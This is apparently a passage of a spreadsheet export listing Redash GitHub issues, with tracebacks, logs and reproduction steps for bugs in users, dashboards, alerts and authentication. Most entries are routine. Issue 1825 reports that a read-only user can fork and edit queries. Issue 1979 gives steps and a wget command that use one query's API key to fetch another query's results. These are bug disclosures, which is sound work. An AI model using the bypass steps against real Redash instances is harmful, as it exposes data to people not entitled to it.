in encode chunks = self.iterencode(o, _one_shot=True) File "/usr/lib/python2.7/json/encoder.py", line 270, in iterencode return _iterencode(o, 0) File "/opt/redash/redash/utils.py", line 57, in default return o.isoformat() AttributeError: 'datetime.timedelta' object has no attribute 'isoformat' </t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/785</t>
  </si>
  <si>
    <t>DataError: invalid input syntax for integer: "admin"</t>
  </si>
  <si>
    <t>Latest 0.9.2-RC. When you make a user admin with a checkbox: ![image](https://cloud.githubusercontent.com/assets/89186/12489616/1c1ac55c-c069-11e5-9cee-e97b299f522d.png)  [2016-01-21 17:58:21,655][PID:12][ERROR][redash.wsgi] Exception on /api/users/2 [POST] Traceback (most recent call last): File "/usr/local/lib/python2.7/dist-packages/flask/app.py", line 1475, in full_dispatch_request rv = self.dispatch_request() File "/usr/local/lib/python2.7/dist-packages/flask/app.py", line 1461, in dispatch_request return self.view_functions[rule.endpoint](**req.view_args) File "/usr/local/lib/python2.7/dist-packages/flask_restful/__init__.py", line 477, in wrapper resp = resource(*args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/flask_login.py", line 792, in decorated_view return func(*args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/flask/views.py", line 84, in view return self.dispatch_request(*args, **kwargs) File "/opt/redash/redash/handlers/base.py", line 19, in dispatch_request return super(BaseResource, self).dispatch_request(*args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/flask_restful/__init__.py", line 587, in dispatch_request resp = meth(*args, **kwargs) File "/opt/redash/redash/handlers/users.py", line 76, in post user.update_instance(**params) File "/opt/redash/redash/models.py", line 106, in update_instance self.save(only=self.dirty_fields) File "/opt/redash/redash/models.py", line 93, in save super(BaseModel, self).save(*args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/peewee.py", line 4146, in save rows = self.update(**field_dict).where(self._pk_expr()).execute() File "/usr/local/lib/python2.7/dist-packages/peewee.py", line 2751, in execute return self.database.rows_affected(self._execute()) File "/opt/redash/redash/metrics/database.py", line 50, in metered_execute result = real_execute(self, *args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/peewee.py", line 2371, in _execute return self.database.execute_sql(sql, params, self.require_commit) File "/opt/redash/redash/metrics/database.py", line 22, in execute_sql result = super(MeteredPostgresqlExtDatabase, self).execute_sql(*args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/playhouse/postgres_ext.py", line 369, in execute_sql self.commit() File "/usr/local/lib/python2.7/dist-packages/peewee.py", line 2922, in __exit__ reraise(new_type, new_type(*exc_value.args), traceback) File "/usr/local/lib/python2.7/dist-packages/playhouse/postgres_ext.py", line 360, in execute_sql cursor.execute(sql, params or ()) DataError: invalid input syntax for integer: "admin" LINE 1: " = E'foo@bar.com', "groups" = ARRAY[2, E'admin']   Adding to admin group works.</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/832</t>
  </si>
  <si>
    <t>Trouble adding data sources</t>
  </si>
  <si>
    <t>Hi there, When I add a datasource, it says it's saved it, with a green tick, but if I open it back up again to modify it, all of the settings have gone. Nick.</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/916</t>
  </si>
  <si>
    <t>Vertica doesn't show schema</t>
  </si>
  <si>
    <t>Vertica query runner returns error due to incompatible get_schema method</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/961</t>
  </si>
  <si>
    <t>Support for UUID type in MSSQL query runner</t>
  </si>
  <si>
    <t>Currently it fails on serializing to JSON (need to add fallback in the serializer to cast into string).</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/1194</t>
  </si>
  <si>
    <t>Shared dashboard crashes if one of the queries has no results yet</t>
  </si>
  <si>
    <t>When loading a shared dashboard, if one of the queries doesn't have results yet, the dashboard won't load.</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/1247</t>
  </si>
  <si>
    <t>Download Dataset does not work when not logged in</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary Using a query public URL, trying to download the dataset as a CSV when not logged in fails  Steps to Reproduce 1. Create a query that returns a table 2. Create a public link using "embed" (use the src argument) 3. Open the link from an **anonymous** browser window 4. Click Download Dataset CSV Getting ![image](https://cloud.githubusercontent.com/assets/106487/17824986/fee1e108-6619-11e6-9f55-4e3c99a8f633.png)  Technical details: - Redash Version: 0.11.1+b2095 - Browser/OS: Chrome / Mac</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/1259</t>
  </si>
  <si>
    <t>Can't logout when using only Google Apps SSO</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary Trying to logout Redash keep redirecting me to the login page and signing me in automatically. This happened on a fresh installation with the following settings, which I think that is somehow related with the issue: - **REDASH_GOOGLE_APPS_DOMAINS**: "domain1.com,gmail.com" - **REDASH_PASSWORD_LOGIN_ENABLED**: "false"  the logs:  [2016-08-26 03:32:45,014][PID:25][INFO][metrics] method=GET path=/logout endpoint=redash.logout status=302 content_type=text/html; charset=utf-8 content_length=237 duration=6.48 query_count=2 query_duration=2.41 [2016-08-26 03:32:45,016][PID:25][INFO][metrics] method=GET path=/logout endpoint=redash.logout status=500 content_type=? content_length=-1 duration=8.56 query_count=2 query_duration=2.41 [2016-08-26 03:32:45,163][PID:25][INFO][metrics] method=GET path=/login endpoint=redash.login status=302 content_type=text/html; charset=utf-8 content_length=251 duration=2.97 query_count=0 query_duration=0.00 [2016-08-26 03:32:45,165][PID:25][INFO][metrics] method=GET path=/login endpoint=redash.login status=500 content_type=? content_length=-1 duration=5.24 query_count=0 query_duration=0.00 [2016-08-26 03:32:45,438][PID:25][INFO][metrics] method=GET path=/oauth/google endpoint=google_oauth.authorize status=302 content_type=text/html; charset=utf-8 content_length=941 duration=2.95 query_count=0 query_duration=0.00 [2016-08-26 03:32:45,440][PID:25][INFO][metrics] method=GET path=/oauth/google endpoint=google_oauth.authorize status=500 content_type=? content_length=-1 duration=5.40 query_count=0 query_duration=0.00 [2016-08-26 03:32:46,375][PID:25][INFO][requests.packages.urllib3.connectionpool] Starting new HTTPS connection (1): www.googleapis.com [2016-08-26 03:32:46,634][PID:25][INFO][metrics] method=GET path=/oauth/google_callback endpoint=google_oauth.callback status=302 content_type=text/html; charset=utf-8 content_length=209 duration=494.07 query_count=6 query_duration=3.87 [2016-08-26 03:32:46,637][PID:25][INFO][metrics] method=GET path=/oauth/google_callback endpoint=google_oauth.callback status=500 content_type=? content_length=-1 duration=496.63 query_count=6 query_duration=3.87 [2016-08-26 03:32:46,789][PID:30][INFO][metrics] method=GET path=/ endpoint=redash.index status=200 content_type=text/html; charset=utf-8 content_length=3420 duration=8.75 query_count=4 query_duration=3.33 [2016-08-26 03:32:46,791][PID:30][INFO][metrics] method=GET path=/ endpoint=redash.index status=500 content_type=? content_length=-1 duration=10.59 query_count=4 query_duration=3.33 [2016-08-26 03:32:48,043][PID:30][INFO][metrics] method=GET path=/api/dashboards endpoint=dashboards status=200 content_type=application/json content_length=2 duration=11.50 query_count=5 query_duration=5.29 [2016-08-26 03:32:48,045][PID:30][INFO][metrics] method=GET path=/api/dashboards endpoint=dashboards status=500 content_type=? content_length=-1 duration=13.32 query_count=5 query_duration=5.29 [2016-08-26 03:32:48,222][PID:30][INFO][metrics] method=GET path=/api/queries/recent endpoint=recent_queries status=200 content_type=application/json content_length=2 duration=14.51 query_count=5 query_duration=7.75 [2016-08-26 03:32:48,225][PID:30][INFO][metrics] method=GET path=/api/queries/recent endpoint=recent_queries status=500 content_type=? content_length=-1 duration=17.70 query_count=5 query_duration=7.75 [2016-08-26 03:32:48,226][PID:25][INFO][metrics] method=GET path=/api/dashboards/recent endpoint=recent_dashboards status=200 content_type=application/json content_length=2 duration=15.83 query_count=7 query_duration=7.64 [2016-08-26 03:32:48,228][PID:25][INFO][metrics] method=GET path=/api/dashboards/recent endpoint=recent_dashboards status=500 content_type=? content_length=-1 duration=18.15 query_count=7 query_duration=7.64 [2016-08-26 03:32:49,253][PID:32][INFO][metrics] method=POST path=/api/events endpoint=events status=200 content_type=application/json content_length=4 duration=9.48 query_count=3 query_duration=2.62 [2016-08-26 03:32:49,255][PID:32][INFO][metrics] method=POST path=/api/events endpoint=events status=500 content_type=? content_length=-1 duration=11.85 query_count=3 query_duration=2.62   - Redash Version: 0.12.0-rc - Browser/OS: Chrome Incognito Mode - How did you install Redash: docker</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/1432</t>
  </si>
  <si>
    <t>Delete visualization with many series fails with '414 Request-URI Too Long'</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary Delete visualization fails with '414 Request-URI Too Long' when the visualization has a lot (100+) of series. apache log shows: &gt; DELETE /api/visualizations/7?created_at=2016-11-23T15:32:17.259565%2B09:00&amp;description=&amp;name=Time&amp;options=%7B%22showlegend%22:false,%22yAxis%22:%5B%7B%22title%22:%7B%22text%22:%22%22%7D,%22rangeMax%22:1499999999999,%22type%22:%22datetime%22,%22rangeMin%22:1471000000000,%22series%22:%7B%22stacking%22:null%7D,%22globalSeriesType%22:%22line%22,%22sortX%22:true,%22seriesOptions%22:%7B%221%22:%7B%22zIndex%22:0,%22index%22:0,%22type%22:%22line%22,%22yAxis%22:0%7D,%222%22:%7B%22zIndex%22:1,%22index%22:0,%22type%22:%22line%22,%22yAxis%22:0%7D,%223%22:%7B%22zIndex%22:2,%22index%22:0,%22type%22:%22line%22, Do we need all the `options` in GET parameter?  Technical details: * Redash Version: 12.0 * Browser/OS: Chrome/Win8 * How did you install Redash: Bitnami+git clone</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/1439</t>
  </si>
  <si>
    <t>Issue with dashboard layout causes API exceptions</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, we've recently hit a bug with one of our dashboards. There seems to be an issue with the layout, resulting in 500 API errors:  [2016-12-01 02:30:50,198][PID:4692][ERROR][redash] Exception on /api/dashboards/test-dashboard [GET] Traceback (most recent call last): File "/usr/local/lib/python2.7/dist-packages/flask/app.py", line 1475, in full_dispatch_request rv = self.dispatch_request() File "/usr/local/lib/python2.7/dist-packages/flask/app.py", line 1461, in dispatch_request return self.view_functions[rule.endpoint](**req.view_args) File "/usr/local/lib/python2.7/dist-packages/flask_restful/__init__.py", line 477, in wrapper resp = resource(*args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/flask_login.py", line 792, in decorated_view return func(*args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/flask/views.py", line 84, in view return self.dispatch_request(*args, **kwargs) File "/opt/redash/redash.0.12.0.b2354/redash/handlers/base.py", line 25, in dispatch_request return super(BaseResource, self).dispatch_request(*args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/flask_restful/__init__.py", line 587, in dispatch_request resp = meth(*args, **kwargs) File "/opt/redash/redash.0.12.0.b2354/redash/permissions.py", line 47, in decorated return fn(*args, **kwargs) File "/opt/redash/redash.0.12.0.b2354/redash/handlers/dashboards.py", line 47, in get response = dashboard.to_dict(with_widgets=True, user=self.current_user) File "/opt/redash/redash.0.12.0.b2354/redash/models.py", line 1114, in to_dict for widget_id in row: TypeError: 'NoneType' object is not iterable  This change in `redash/models.py` appears to fix the problem: Old:  for row in layout: new_row = [] for widget_id in row:   New:  for row in layout: if not row: continue new_row = [] for widget_id in row:  </t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/1447</t>
  </si>
  <si>
    <t>REDASH_MULTI_ORG broken in Angular 1.5</t>
  </si>
  <si>
    <t xml:space="preserve">The latest code in master no longer works with `REDASH_MULTI_ORG=True`. What I can gleam is that the asset requests are being thought to be an organization (http://host/app.js -&gt; http://host/org where org: app.js). I think there may have been some logic for this in the template previously, but it's been lost. The output is as follows (I've added a print for the `SLUG = X` in `authentication/org_resolving.py`):  [2016-12-05 11:51:45,164][PID:5358][CRITICAL][root] SLUG = styles.css 11:51:45 web.1 | [2016-12-05 11:51:45,167][PID:5358][ERROR][redash] Exception on /styles.css/ [GET] 11:51:45 web.1 | Traceback (most recent call last): 11:51:45 web.1 | File ".anaconda/envs/redash/lib/python2.7/site-packages/flask/app.py", line 1817, in wsgi_app 11:51:45 web.1 | response = self.full_dispatch_request() 11:51:45 web.1 | File ".anaconda/envs/redash/lib/python2.7/site-packages/flask/app.py", line 1477, in full_dispatch_request 11:51:45 web.1 | rv = self.handle_user_exception(e) 11:51:45 web.1 | File ".anaconda/envs/redash/lib/python2.7/site-packages/flask_restful/__init__.py", line 271, in error_router 11:51:45 web.1 | return original_handler(e) 11:51:45 web.1 | File ".anaconda/envs/redash/lib/python2.7/site-packages/flask/app.py", line 1381, in handle_user_exception 11:51:45 web.1 | reraise(exc_type, exc_value, tb) 11:51:45 web.1 | File ".anaconda/envs/redash/lib/python2.7/site-packages/flask/app.py", line 1475, in full_dispatch_request 11:51:45 web.1 | rv = self.dispatch_request() 11:51:45 web.1 | File ".anaconda/envs/redash/lib/python2.7/site-packages/flask/app.py", line 1461, in dispatch_request 11:51:45 web.1 | return self.view_functions[rule.endpoint](**req.view_args) 11:51:45 web.1 | File ".anaconda/envs/redash/lib/python2.7/site-packages/flask_login.py", line 790, in decorated_view 11:51:45 web.1 | elif not current_user.is_authenticated: 11:51:45 web.1 | File ".anaconda/envs/redash/lib/python2.7/site-packages/werkzeug/local.py", line 343, in __getattr__ 11:51:45 web.1 | return getattr(self._get_current_object(), name) 11:51:45 web.1 | File ".anaconda/envs/redash/lib/python2.7/site-packages/werkzeug/local.py", line 302, in _get_current_object 11:51:45 web.1 | return self.__local() 11:51:45 web.1 | File ".anaconda/envs/redash/lib/python2.7/site-packages/flask_login.py", line 47, in &lt;lambda&gt; 11:51:45 web.1 | current_user = LocalProxy(lambda: _get_user()) 11:51:45 web.1 | File ".anaconda/envs/redash/lib/python2.7/site-packages/flask_login.py", line 858, in _get_user 11:51:45 web.1 | current_app.login_manager._load_user() 11:51:45 web.1 | File ".anaconda/envs/redash/lib/python2.7/site-packages/flask_login.py", line 389, in _load_user 11:51:45 web.1 | return self.reload_user() 11:51:45 web.1 | File ".anaconda/envs/redash/lib/python2.7/site-packages/flask_login.py", line 351, in reload_user 11:51:45 web.1 | user = self.user_callback(user_id) 11:51:45 web.1 | File "redash/redash/authentication/__init__.py", line 40, in load_user 11:51:45 web.1 | return models.User.get_by_id_and_org(user_id, current_org.id) 11:51:45 web.1 | File ".anaconda/envs/redash/lib/python2.7/site-packages/werkzeug/local.py", line 343, in __getattr__ 11:51:45 web.1 | return getattr(self._get_current_object(), name) 11:51:45 web.1 | File ".anaconda/envs/redash/lib/python2.7/site-packages/werkzeug/local.py", line 302, in _get_current_object 11:51:45 web.1 | return self.__local() 11:51:45 web.1 | File "redash/redash/authentication/org_resolving.py", line 19, in _get_current_org 11:51:45 web.1 | org = Organization.get_by_slug(slug) 11:51:45 web.1 | File "redash/models.py", line 302, in get_by_slug 11:51:45 web.1 | return cls.get(cls.slug == slug) 11:51:45 web.1 | File ".anaconda/envs/redash/lib/python2.7/site-packages/peewee.py", line 4012, in get 11:51:45 web.1 | return sq.get() 11:51:45 web.1 | File ".anaconda/envs/redash/lib/python2.7/site-packages/peewee.py", line 2645, in get 11:51:45 web.1 | % self.sql()) 11:51:45 web.1 | OrganizationDoesNotExist: Instance matching query does not exist: 11:51:45 web.1 | SQL: SELECT "t1"."id", "t1"."updated_at", "t1"."created_at", "t1"."name", "t1"."slug", "t1"."settings" FROM "organizations" AS t1 WHERE ("t1"."slug" = %s) 11:51:45 web.1 | PARAMS: [u'styles.css'] </t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/1451</t>
  </si>
  <si>
    <t>Support for sanitized HTML in tables output</t>
  </si>
  <si>
    <t>The new table results component doesn't support HTML in query results. Need to support sanitized HTML as we had before.</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/1499</t>
  </si>
  <si>
    <t>Queries search should be case insensitive</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/1694</t>
  </si>
  <si>
    <t>Multiple Redash users with the same email-id</t>
  </si>
  <si>
    <t>- Currently in the Redash code, It is possible to create multiple users with the same email-id, because email is not case insensitive. - For example It is possible to create two users like InFo@reDaSh.io and INFO@REDASH.IO, Now when we try to login through Google Auth, Redash gets email id as info@redash.io which matches with none of the emails ( InFo@reDaSh.io and INFO@REDASH.IO ). This issue has been the source of several login failures at our company.</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/1824</t>
  </si>
  <si>
    <t>AttributeError: 'ApiUser' object has no attribute 'email'</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary API POST calls to /api/queries//refresh throw this error on 1.0.3+b2850  Steps to Reproduce 1. Make a POST call to /api/queries//refresh 2. See error in api_error.log and 500 result Full error with trace:  Exception on /api/queries//refresh [POST] Traceback (most recent call last): File "/usr/local/lib/python2.7/dist-packages/flask/app.py", line 1639, in full_dispatch_request rv = self.dispatch_request() File "/usr/local/lib/python2.7/dist-packages/flask/app.py", line 1625, in dispatch_request return self.view_functions[rule.endpoint](**req.view_args) File "/usr/local/lib/python2.7/dist-packages/flask_restful/__init__.py", line 477, in wrapper resp = resource(*args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/flask_login/utils.py", line 228, in decorated_view return func(*args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/flask/views.py", line 84, in view return self.dispatch_request(*args, **kwargs) File "/opt/redash/redash.1.0.3.b2850/redash/handlers/base.py", line 28, in dispatch_request return super(BaseResource, self).dispatch_request(*args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/flask_restful/__init__.py", line 587, in dispatch_request resp = meth(*args, **kwargs) File "/opt/redash/redash.1.0.3.b2850/redash/handlers/queries.py", line 266, in post return run_query(query.data_source, parameter_values, query.query_text, query.id) File "/opt/redash/redash.1.0.3.b2850/redash/handlers/query_results.py", line 45, in run_query job = enqueue_query(query_text, data_source, current_user.id, metadata={"Username": current_user.email, "Query ID": query_id}) File "/usr/local/lib/python2.7/dist-packages/werkzeug/local.py", line 343, in __getattr__ return getattr(self._get_current_object(), name) AttributeError: 'ApiUser' object has no attribute 'email'  Same request worked in some previous version of Redash. Looking at the current code on master, it seems to still make the same reference to `current_user.email` so assuming this bug still exists, but haven't confirmed that yet.  Technical details: * Redash Version: 1.0.3+b2850 * Browser/OS: N/A * How did you install Redash: N/A</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/1825</t>
  </si>
  <si>
    <t>An unauthorized (read only) user can create queries</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary I created a user on the default group and set the data source capabilities to "Read only" on that group. Accessing as this brand new user, I really can't create a new query, but I can fork a existing one, and modify it as I want. I think this could be a security flaw.  Steps to Reproduce 1. Installed with docker, connect to a data source (I created a MySQL one); 2. Create a few queries; 3. Create a user and assign him to the "default" group; 4. Set the permissions of the data source for the default group to read only; 5. Do login with the brand new user and click to list the queries; 6. Choice one of the queries and fork it. I expect that a "read only" role should really be read only.  Technical details: * Redash Version: 1.0.3+b2850 * Browser/OS: Google Chrome 59/Fedora 25 * How did you install Redash: Docker with the suggested `docker-compose.production.yml`</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/1842</t>
  </si>
  <si>
    <t>Updating Alert Destination email field does not change the value in the database</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary Updating the email address list for an Alert Destination does not update the database.  Steps to Reproduce 1. Create an email alert destination group, refresh page. 2. Change one or more emails, save. Refresh page. 3. The email group is the same as it was when created. 4. Confirm via a DB query (select * from notification_destinations;)  Technical details: * Redash Version: 1.0.3+b2850 * Browser/OS: Various, consistent behaves the same * How did you install Redash: https://raw.githubusercontent.com/getredash/redash/master/bin/upgrade More details: Checking the API log for the update (when I click the save button) things look ok:  [2017-06-23 21:17:26,311][PID:25417][INFO][metrics] method=POST path=/api/destinations/1 endpoint=destination status=200 content_type=application/json content_length=144 duration=7.94 query_count=4 query_duration=2.80  Enabling statement logging in PostgreSQL shows this happening (with sanitized emails):  2017-06-23 21:31:54.550 UTC [459] redash@redash LOG: statement: BEGIN 2017-06-23 21:31:54.551 UTC [459] redash@redash LOG: statement: SELECT organizations.updated_at AS organizations_updated_at, organizations.created_at AS organizations_created_at, organizations.id AS organizations_id, organizations.name AS organizations_name, organizations.slug AS organizations_slug, organizations.settings AS organizations_settings FROM organizations WHERE organizations.slug = 'default' LIMIT 1 2017-06-23 21:31:54.552 UTC [459] redash@redash LOG: statement: SELECT users.groups AS users_groups, users.updated_at AS users_updated_at, users.created_at AS users_created_at, users.id AS users_id, users.org_id AS users_org_id, users.name AS users_name, users.email AS users_email, users.password_hash AS users_password_hash, users.api_key AS users_api_key FROM users WHERE users.id = '1' AND 1 = users.org_id 2017-06-23 21:31:54.554 UTC [459] redash@redash LOG: statement: SELECT groups.id AS groups_id, groups.org_id AS groups_org_id, groups.type AS groups_type, groups.name AS groups_name, groups.permissions AS groups_permissions, groups.created_at AS groups_created_at FROM groups WHERE groups.id IN (1, 2, 3) 2017-06-23 21:31:54.555 UTC [459] redash@redash LOG: statement: SELECT notification_destinations.id AS notification_destinations_id, notification_destinations.org_id AS notification_destinations_org_id, notification_destinations.user_id AS notification_destinations_user_id, notification_destinations.name AS notification_destinations_name, notification_destinations.type AS notification_destinations_type, notification_destinations.options AS notification_destinations_options, notification_destinations.created_at AS notification_destinations_created_at FROM notification_destinations WHERE notification_destinations.id = '1' AND 1 = notification_destinations.org_id 2017-06-23 21:31:54.557 UTC [459] redash@redash LOG: statement: COMMIT  In other words, it does not appear to be even attempting to update the addresses.</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/1950</t>
  </si>
  <si>
    <t>record_event task fails for view events generated by an user who accesses a dashboard using a public sharing link</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary If I share a dashboard and access it through the generated public URL, the worker prints an error to the log when it tries to write the view event into the events log table from the record_event task.  Steps to Reproduce I was able to reproduce this issue by using the docker-compose.yml file provided in the repository (i.e. in a dev setup): 1. Setup a fresh instance of Redash 2. Create a new dashboard 3. Click the share button and enable public sharing 4. Copy the public sharing link (e.g. `http://localhost:5000/public/dashboards/CH6m72tekgbplwzelZuxWzdtWu3LlbsewVYVxm8J?org_slug=default`) and access it with a clean browser profile (or private window that has no redash login cookies around)  What happens? The following error can be seen in the worker logs:  [2017-09-07 08:03:40,006: ERROR/MainProcess] Task redash.tasks.record_event[41674041-c67b-4659-a151-99f9e73e3301] raised unexpected: DataError('(psycopg2.DataError) invalid input syntax for integer: "CH6m72tekgbplwzelZuxWzdtWu3LlbsewVYVxm8J"\nLINE 1: id, additional_properties, created_at) VALUES (1, \'CH6m72tek\n ^\n',) Traceback (most recent call last): File "/usr/local/lib/python2.7/dist-packages/celery/app/trace.py", line 240, in trace_task R = retval = fun(*args, **kwargs) File "/app/redash/worker.py", line 69, in __call__ return TaskBase.__call__(self, *args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/celery/app/trace.py", line 438, in __protected_call__ return self.run(*args, **kwargs) File "/app/redash/tasks/general.py", line 15, in record_event models.db.session.commit() File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/orm/scoping.py", line 157, in do return getattr(self.registry(), name)(*args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/orm/session.py", line 874, in commit self.transaction.commit() File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/orm/session.py", line 461, in commit self._prepare_impl() File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/orm/session.py", line 441, in _prepare_impl self.session.flush() File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/orm/session.py", line 2137, in flush self._flush(objects) File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/orm/session.py", line 2257, in _flush transaction.rollback(_capture_exception=True) File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/util/langhelpers.py", line 60, in __exit__ compat.reraise(exc_type, exc_value, exc_tb) File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/orm/session.py", line 2221, in _flush flush_context.execute() File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/orm/unitofwork.py", line 389, in execute rec.execute(self) File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/orm/unitofwork.py", line 548, in execute uow File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/orm/persistence.py", line 181, in save_obj mapper, table, insert) File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/orm/persistence.py", line 835, in _emit_insert_statements execute(statement, params) File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/engine/base.py", line 945, in execute return meth(self, multiparams, params) File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/sql/elements.py", line 263, in _execute_on_connection return connection._execute_clauseelement(self, multiparams, params) File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/engine/base.py", line 1053, in _execute_clauseelement compiled_sql, distilled_params File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/engine/base.py", line 1189, in _execute_context context) File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/engine/base.py", line 1393, in _handle_dbapi_exception exc_info File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/util/compat.py", line 202, in raise_from_cause reraise(type(exception), exception, tb=exc_tb, cause=cause) File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/engine/base.py", line 1182, in _execute_context context) File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/engine/default.py", line 469, in do_execute cursor.execute(statement, parameters) DataError: (psycopg2.DataError) invalid input syntax for integer: "CH6m72tekgbplwzelZuxWzdtWu3LlbsewVYVxm8J" LINE 1: id, additional_properties, created_at) VALUES (1, 'CH6m72tek ^ [SQL: 'INSERT INTO events (org_id, user_id, action, object_type, object_id, additional_properties, created_at) VALUES (%(org_id)s, %(user_id)s, %(action)s, %(object_type)s, %(object_id)s, %(additional_properties)s, %(created_at)s) RETURNING events.id'] [parameters: {'user_id': u'CH6m72tekgbplwzelZuxWzdtWu3LlbsewVYVxm8J', 'created_at': datetime.datetime(2017, 9, 7, 8, 3, 39), 'object_type': 'dashboard', 'org_id': 1, 'object_id': 1, 'additional_properties': '{"ip": "172.20.0.1", "public": true, "referer": null, "user_agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0", "headless": false}', 'action': 'view'}]  Coincidentally, the value that fails to be set to the user_id field (`CH6m72tekgbplwzelZuxWzdtWu3LlbsewVYVxm8J`) is the token seen in the public sharing URL (`http://localhost:5000/public/dashboards/CH6m72tekgbplwzelZuxWzdtWu3LlbsewVYVxm8J?org_slug=default`)  What should happen? The view event is properly saved to the events table and the task does not crash.  Technical details: * Redash Version: Both stable release 2.0.0 and latest master with commit ID 2a22b98c77757f378d3a4ed1ec8eceb99f0a8b35 * How did you install Redash: Stable v2.0.0 by upgrading a previous version with the bin/upgrade script and the latest commit in master using the provided docker-compose configuration and following the developer environment setup. I believe this issue was discussed in #1238 but that lacked a proper STR to actually fix the root cause of this issue. It did had some good ideas about what could cause the bug and it indeed seems that an anonymous user causes an incorrect user_id to be included in the view event.</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/1979</t>
  </si>
  <si>
    <t>The API key for one query may be used to retrieve another query's results</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary A query's API key may be used to obtain another query's results via the REST api when including the API key in the query string.  Steps to Reproduce 1. Create one query and execute it to obtain results (call it query A) 2. Create another query and execute it to obtain different results (call it query B) 3. Get the query's API key for query A (A_API_KEY) and the query number for query A (A_QUERY_NUMBER) 4. Get the result number from query B's most recent run (B_RESULT_NUMBER) 5. Execute the below code and you'll see that the API key for query A can get results from query B bash REDASH_DOMAIN='yourdomain.com' A_QUERY_NUMBER='query number for query A' A_API_KEY_A='api key for query A' B_RESULT_NUMBER='query result number for query b' # this will download query B's results using query A's access key wget \ -O query_b_results.csv \ "https://$REDASH_DOMAIN/api/queries/$A_QUERY_NUMBER/results/$B_RESULT_NUMBER.csv?api_key=$A_API_KEY"  This is a bug because one query's API key should NOT be able to access another query's results.  Technical details: * Redash Version: 1.0.3 * Browser/OS: (Command Line) / Linux Mint 18.2 * How did you install Redash: Command line</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/2137</t>
  </si>
  <si>
    <t>Case insensitive parameters in Redash query result cache</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary Redash may display wrong results for query with case sensitive parameter. It looks like results cache is ignoring param letters size.  Steps to Reproduce 1. Create a query with global text parameter. 2. Create dashboard with visualization for this query. 3. Open dashboard with parameter set to lowercase letter for example 'test' 4. Open dashboard on a new tab with parameter 'TEST'. In the last step you should receive visualization for parameter 'test' even when parameter value is set to 'TEST' I have been able to reproduce this scenario on demo.redash.io. To reproduce do: 1. Open link: http://demo.redash.io/dashboard/ma_dashboard?p_dashboard_name=test You should see rows from dashboard table with name `test` 2. Open link: http://demo.redash.io/dashboard/ma_dashboard?p_dashboard_name=Test You should see rows from dashboard table with name `test` even when parameter `dashboard_name` is set to `Test`. After refreshing visualization result changed to proper one.  Technical details: * Redash Version: 3.0.0+b3134 * Browser/OS: Chrome/Firefox/Opera * How did you install Redash: used demo.redash.io</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/2235</t>
  </si>
  <si>
    <t>LDAP Auth /login_auth/login 404</t>
  </si>
  <si>
